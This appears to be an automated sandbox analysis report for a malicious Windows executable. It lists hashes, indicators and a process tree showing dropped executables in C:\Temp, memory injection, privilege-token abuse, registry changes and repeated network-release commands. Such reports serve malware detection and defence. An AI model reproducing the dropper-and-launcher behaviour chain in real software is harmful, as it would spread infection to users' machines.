9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925

Analysis

max time kernel
155s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
11/10/2022, 14:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
Size

361KB
MD5

20d9f4fb1bf5fb7e7affce91ade4bba0
SHA1

273d7ed7c528289e49ac0e6a8f76af355b8b08fe
SHA256

9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925
SHA512

a9d27d6b3e8d5e8b992c9d16cba5cbf472f68ee013ee14f269fa1fbb5b1c0f57997aa8d4b43e0df4355ae54b7f2ab2150f3e6d5886cf0efbd2ed609e56534439
SSDEEP

6144:kflfAsiL4lIJjiJcbI03GBc3ucY5DCSjX:kflfAsiVGjSGecvX

Score

10^/10

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 55 IoCs

description	pid	Process	procid_target
PID 220 created 3984	220	svchost.exe	85
PID 220 created 3796	220	svchost.exe	88
PID 220 created 1384	220	svchost.exe	92
PID 220 created 852	220	svchost.exe	94
PID 220 created 2720	220	svchost.exe	96
PID 220 created 1264	220	svchost.exe	99
PID 220 created 2556	220	svchost.exe	101
PID 220 created 2340	220	svchost.exe	103
PID 220 created 2768	220	svchost.exe	107
PID 220 created 1984	220	svchost.exe	110
PID 220 created 1604	220	svchost.exe	112
PID 220 created 2680	220	svchost.exe	117
PID 220 created 4976	220	svchost.exe	121
PID 220 created 3904	220	svchost.exe	123
PID 220 created 3548	220	svchost.exe	128
PID 220 created 4744	220	svchost.exe	130
PID 220 created 1964	220	svchost.exe	132
PID 220 created 1476	220	svchost.exe	135
PID 220 created 4392	220	svchost.exe	137
PID 220 created 3632	220	svchost.exe	139
PID 220 created 2984	220	svchost.exe	142
PID 220 created 4184	220	svchost.exe	144
PID 220 created 5076	220	svchost.exe	146
PID 220 created 3208	220	svchost.exe	149
PID 220 created 4280	220	svchost.exe	151
PID 220 created 1604	220	svchost.exe	153
PID 220 created 4980	220	svchost.exe	156
PID 220 created 3988	220	svchost.exe	158
PID 220 created 4372	220	svchost.exe	160
PID 220 created 3476	220	svchost.exe	163
PID 220 created 4776	220	svchost.exe	165
PID 220 created 3900	220	svchost.exe	167
PID 220 created 3424	220	svchost.exe	170
PID 220 created 3520	220	svchost.exe	172
PID 220 created 3192	220	svchost.exe	174
PID 220 created 3796	220	svchost.exe	177
PID 220 created 2396	220	svchost.exe	179
PID 220 created 5020	220	svchost.exe	181
PID 220 created 2136	220	svchost.exe	184
PID 220 created 2132	220	svchost.exe	186
PID 220 created 4292	220	svchost.exe	188
PID 220 created 1072	220	svchost.exe	191
PID 220 created 4252	220	svchost.exe	193
PID 220 created 2228	220	svchost.exe	195
PID 220 created 3544	220	svchost.exe	198
PID 220 created 788	220	svchost.exe	200
PID 220 created 5080	220	svchost.exe	202
PID 220 created 3860	220	svchost.exe	205
PID 220 created 216	220	svchost.exe	207
PID 220 created 1008	220	svchost.exe	209
PID 220 created 1824	220	svchost.exe	212
PID 220 created 4732	220	svchost.exe	214
PID 220 created 2120	220	svchost.exe	216
PID 220 created 3488	220	svchost.exe	219
PID 220 created 1192	220	svchost.exe	221

Executes dropped EXE 64 IoCs

pid	Process
4376	gaylidxvqnigaysq.exe
3984	CreateProcess.exe
856	vqnifaysnl.exe
3796	CreateProcess.exe
1384	CreateProcess.exe
1304	i_vqnifaysnl.exe
852	CreateProcess.exe
2672	icavsndxvp.exe
2720	CreateProcess.exe
1264	CreateProcess.exe
4252	i_icavsndxvp.exe
2556	CreateProcess.exe
3260	xupnhfzxsp.exe
2340	CreateProcess.exe
2768	CreateProcess.exe
4140	i_xupnhfzxsp.exe
1984	CreateProcess.exe
4732	xrpjhczurm.exe
1604	CreateProcess.exe
2680	CreateProcess.exe
3536	i_xrpjhczurm.exe
4976	CreateProcess.exe
1092	wrpjhbzurm.exe
3904	CreateProcess.exe
3548	CreateProcess.exe
3740	i_wrpjhbzurm.exe
4744	CreateProcess.exe
1228	ywrojgbztr.exe
1964	CreateProcess.exe
1476	CreateProcess.exe
4080	i_ywrojgbztr.exe
4392	CreateProcess.exe
4252	igbytrljdb.exe
3632	CreateProcess.exe
2984	CreateProcess.exe
2924	i_igbytrljdb.exe
4184	CreateProcess.exe
2320	ljdbvtndyv.exe
5076	CreateProcess.exe
3208	CreateProcess.exe
2916	i_ljdbvtndyv.exe
4280	CreateProcess.exe
5028	nigaysqkid.exe
1604	CreateProcess.exe
4980	CreateProcess.exe
2772	i_nigaysqkid.exe
3988	CreateProcess.exe
3644	ifaysqkica.exe
4372	CreateProcess.exe
3476	CreateProcess.exe
4684	i_ifaysqkica.exe
4776	CreateProcess.exe
1092	nhfzxrpkhc.exe
3900	CreateProcess.exe
3424	CreateProcess.exe
1828	i_nhfzxrpkhc.exe
3520	CreateProcess.exe
3124	usmkecwupm.exe
3192	CreateProcess.exe
3796	CreateProcess.exe
3016	i_usmkecwupm.exe
2396	CreateProcess.exe
2160	ezxrpjhbzu.exe
5020	CreateProcess.exe

Gathers network information 2 TTPs 18 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
4172	ipconfig.exe
700	ipconfig.exe
5072	ipconfig.exe
3688	ipconfig.exe
4072	ipconfig.exe
3744	ipconfig.exe
4652	ipconfig.exe
2460	ipconfig.exe
4516	ipconfig.exe
2140	ipconfig.exe
3228	ipconfig.exe
3860	ipconfig.exe
2468	ipconfig.exe
4084	ipconfig.exe
4432	ipconfig.exe
3020	ipconfig.exe
3880	ipconfig.exe
1300	ipconfig.exe

Modifies Internet Explorer settings 1 TTPs 35 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 60074134acddd801	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30989740"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30989740"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000043e2eb2e51ccf149ab640c8bdb0d79060000000002000000000010660000000100002000000072f394cc8ec95267f57f1538a94eab67df5c551639f9ab0cecf025d7f6a36a45000000000e80000000020000200000009467af44dc93f21a561088ba6cac46ef687fb59828695a52488f9a213ba75264200000000b1152be9d95e3134766f418392bc092b2ad284f2fd863fa88fe9e23e380c8d040000000b2a76352078e242d62769ee496cbbec6c0ab040ec2159d8daa0c1fc2ded5b6c56c8163dacd6bc0ed29ff932d6f3f13965538005032daf2f2fafa8ff08b82bdbd	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "372283409"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "829646414"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{5CE879D3-499F-11ED-A0EE-426B8B52D88D} = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "855896946"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c0701834acddd801	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "829646414"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30989740"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000043e2eb2e51ccf149ab640c8bdb0d790600000000020000000000106600000001000020000000390eca22a65d72039c3018efa785bc98ecc6060e2ec2a44bc43bf1a0df3a0c9f000000000e80000000020000200000009e0c2e65ae51919f154b1f9417e994e86536640c5adf10440bd56f916859a9de200000000a5b62c7bb3b0210d3996da0380090e8a76394cc916eded417e53c398f19331e40000000054b8b03b269782c6e1e734092e603301f0aaecfacc36cd2d3e5642445e84baf6f859933a95b6a88b6624a049e21f73aa16035333de67578817d2b9756370e02	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
4376	gaylidxvqnigaysq.exe
4376	gaylidxvqnigaysq.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
4376	gaylidxvqnigaysq.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
4376	gaylidxvqnigaysq.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
4376	gaylidxvqnigaysq.exe
4376	gaylidxvqnigaysq.exe
4376	gaylidxvqnigaysq.exe
4376	gaylidxvqnigaysq.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
4376	gaylidxvqnigaysq.exe
4376	gaylidxvqnigaysq.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
4376	gaylidxvqnigaysq.exe
4376	gaylidxvqnigaysq.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
4376	gaylidxvqnigaysq.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
4376	gaylidxvqnigaysq.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1668	iexplore.exe

Suspicious behavior: LoadsDriver 19 IoCs

pid	Process
684	Process not Found
684	Process not Found
684	Process not Found
684	Process not Found
684	Process not Found
684	Process not Found
684	Process not Found
684	Process not Found
684	Process not Found
684	Process not Found
684	Process not Found
684	Process not Found
684	Process not Found
684	Process not Found
684	Process not Found
684	Process not Found
684	Process not Found
684	Process not Found
684	Process not Found

Suspicious use of AdjustPrivilegeToken 20 IoCs

description	pid	Process
Token: SeTcbPrivilege	220	svchost.exe
Token: SeTcbPrivilege	220	svchost.exe
Token: SeDebugPrivilege	1304	i_vqnifaysnl.exe
Token: SeDebugPrivilege	4252	i_icavsndxvp.exe
Token: SeDebugPrivilege	4140	i_xupnhfzxsp.exe
Token: SeDebugPrivilege	3536	i_xrpjhczurm.exe
Token: SeDebugPrivilege	3740	i_wrpjhbzurm.exe
Token: SeDebugPrivilege	4080	i_ywrojgbztr.exe
Token: SeDebugPrivilege	2924	i_igbytrljdb.exe
Token: SeDebugPrivilege	2916	i_ljdbvtndyv.exe
Token: SeDebugPrivilege	2772	i_nigaysqkid.exe
Token: SeDebugPrivilege	4684	i_ifaysqkica.exe
Token: SeDebugPrivilege	1828	i_nhfzxrpkhc.exe
Token: SeDebugPrivilege	3016	i_usmkecwupm.exe
Token: SeDebugPrivilege	2672	i_ezxrpjhbzu.exe
Token: SeDebugPrivilege	3632	i_jhbwtrljeb.exe
Token: SeDebugPrivilege	3824	i_oigbytqljd.exe
Token: SeDebugPrivilege	3376	i_qljdbvtnlg.exe
Token: SeDebugPrivilege	3228	i_davtnlfdxv.exe
Token: SeDebugPrivilege	5068	i_lfdxvpnifa.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1668	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
1668	iexplore.exe
1668	iexplore.exe
3140	IEXPLORE.EXE
3140	IEXPLORE.EXE
3140	IEXPLORE.EXE
3140	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1900 wrote to memory of 4376	1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe	82
PID 1900 wrote to memory of 4376	1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe	82
PID 1900 wrote to memory of 4376	1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe	82
PID 1900 wrote to memory of 1668	1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe	83
PID 1900 wrote to memory of 1668	1900	9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe	83
PID 1668 wrote to memory of 3140	1668	iexplore.exe	84
PID 1668 wrote to memory of 3140	1668	iexplore.exe	84
PID 1668 wrote to memory of 3140	1668	iexplore.exe	84
PID 4376 wrote to memory of 3984	4376	gaylidxvqnigaysq.exe	85
PID 4376 wrote to memory of 3984	4376	gaylidxvqnigaysq.exe	85
PID 4376 wrote to memory of 3984	4376	gaylidxvqnigaysq.exe	85
PID 220 wrote to memory of 856	220	svchost.exe	87
PID 220 wrote to memory of 856	220	svchost.exe	87
PID 220 wrote to memory of 856	220	svchost.exe	87
PID 856 wrote to memory of 3796	856	vqnifaysnl.exe	88
PID 856 wrote to memory of 3796	856	vqnifaysnl.exe	88
PID 856 wrote to memory of 3796	856	vqnifaysnl.exe	88
PID 220 wrote to memory of 4072	220	svchost.exe	90
PID 220 wrote to memory of 4072	220	svchost.exe	90
PID 4376 wrote to memory of 1384	4376	gaylidxvqnigaysq.exe	92
PID 4376 wrote to memory of 1384	4376	gaylidxvqnigaysq.exe	92
PID 4376 wrote to memory of 1384	4376	gaylidxvqnigaysq.exe	92
PID 220 wrote to memory of 1304	220	svchost.exe	93
PID 220 wrote to memory of 1304	220	svchost.exe	93
PID 220 wrote to memory of 1304	220	svchost.exe	93
PID 4376 wrote to memory of 852	4376	gaylidxvqnigaysq.exe	94
PID 4376 wrote to memory of 852	4376	gaylidxvqnigaysq.exe	94
PID 4376 wrote to memory of 852	4376	gaylidxvqnigaysq.exe	94
PID 220 wrote to memory of 2672	220	svchost.exe	95
PID 220 wrote to memory of 2672	220	svchost.exe	95
PID 220 wrote to memory of 2672	220	svchost.exe	95
PID 2672 wrote to memory of 2720	2672	icavsndxvp.exe	96
PID 2672 wrote to memory of 2720	2672	icavsndxvp.exe	96
PID 2672 wrote to memory of 2720	2672	icavsndxvp.exe	96
PID 220 wrote to memory of 2140	220	svchost.exe	97
PID 220 wrote to memory of 2140	220	svchost.exe	97
PID 4376 wrote to memory of 1264	4376	gaylidxvqnigaysq.exe	99
PID 4376 wrote to memory of 1264	4376	gaylidxvqnigaysq.exe	99
PID 4376 wrote to memory of 1264	4376	gaylidxvqnigaysq.exe	99
PID 220 wrote to memory of 4252	220	svchost.exe	100
PID 220 wrote to memory of 4252	220	svchost.exe	100
PID 220 wrote to memory of 4252	220	svchost.exe	100
PID 4376 wrote to memory of 2556	4376	gaylidxvqnigaysq.exe	101
PID 4376 wrote to memory of 2556	4376	gaylidxvqnigaysq.exe	101
PID 4376 wrote to memory of 2556	4376	gaylidxvqnigaysq.exe	101
PID 220 wrote to memory of 3260	220	svchost.exe	102
PID 220 wrote to memory of 3260	220	svchost.exe	102
PID 220 wrote to memory of 3260	220	svchost.exe	102
PID 3260 wrote to memory of 2340	3260	xupnhfzxsp.exe	103
PID 3260 wrote to memory of 2340	3260	xupnhfzxsp.exe	103
PID 3260 wrote to memory of 2340	3260	xupnhfzxsp.exe	103
PID 220 wrote to memory of 3020	220	svchost.exe	104
PID 220 wrote to memory of 3020	220	svchost.exe	104
PID 4376 wrote to memory of 2768	4376	gaylidxvqnigaysq.exe	107
PID 4376 wrote to memory of 2768	4376	gaylidxvqnigaysq.exe	107
PID 4376 wrote to memory of 2768	4376	gaylidxvqnigaysq.exe	107
PID 220 wrote to memory of 4140	220	svchost.exe	108
PID 220 wrote to memory of 4140	220	svchost.exe	108
PID 220 wrote to memory of 4140	220	svchost.exe	108
PID 4376 wrote to memory of 1984	4376	gaylidxvqnigaysq.exe	110
PID 4376 wrote to memory of 1984	4376	gaylidxvqnigaysq.exe	110
PID 4376 wrote to memory of 1984	4376	gaylidxvqnigaysq.exe	110
PID 220 wrote to memory of 4732	220	svchost.exe	111
PID 220 wrote to memory of 4732	220	svchost.exe	111

C:\Users\Admin\AppData\Local\Temp\9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe
"C:\Users\Admin\AppData\Local\Temp\9bb473ab3f27f7f17dea16be8bd5d5e3810f40a3b490d25dd91645bd545a9925.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1900
- C:\Temp\gaylidxvqnigaysq.exe
  C:\Temp\gaylidxvqnigaysq.exe run
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4376
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\vqnifaysnl.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:3984
  - - C:\Temp\vqnifaysnl.exe
      C:\Temp\vqnifaysnl.exe ups_run
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:856
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:3796
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:4072
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_vqnifaysnl.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:1384
  - - C:\Temp\i_vqnifaysnl.exe
      C:\Temp\i_vqnifaysnl.exe ups_ins
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1304
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\icavsndxvp.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:852
  - - C:\Temp\icavsndxvp.exe
      C:\Temp\icavsndxvp.exe ups_run
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2672
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:2720
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:2140
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_icavsndxvp.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:1264
  - - C:\Temp\i_icavsndxvp.exe
      C:\Temp\i_icavsndxvp.exe ups_ins
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:4252
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\xupnhfzxsp.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:2556
  - - C:\Temp\xupnhfzxsp.exe
      C:\Temp\xupnhfzxsp.exe ups_run
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3260
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:2340
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:3020
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_xupnhfzxsp.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:2768
  - - C:\Temp\i_xupnhfzxsp.exe
      C:\Temp\i_xupnhfzxsp.exe ups_ins
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:4140
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\xrpjhczurm.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:1984
  - - C:\Temp\xrpjhczurm.exe
      C:\Temp\xrpjhczurm.exe ups_run
      4⤵
      Executes dropped EXE
      PID:4732
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:1604
      - C:\windows\system32\ipconfig.exe
        
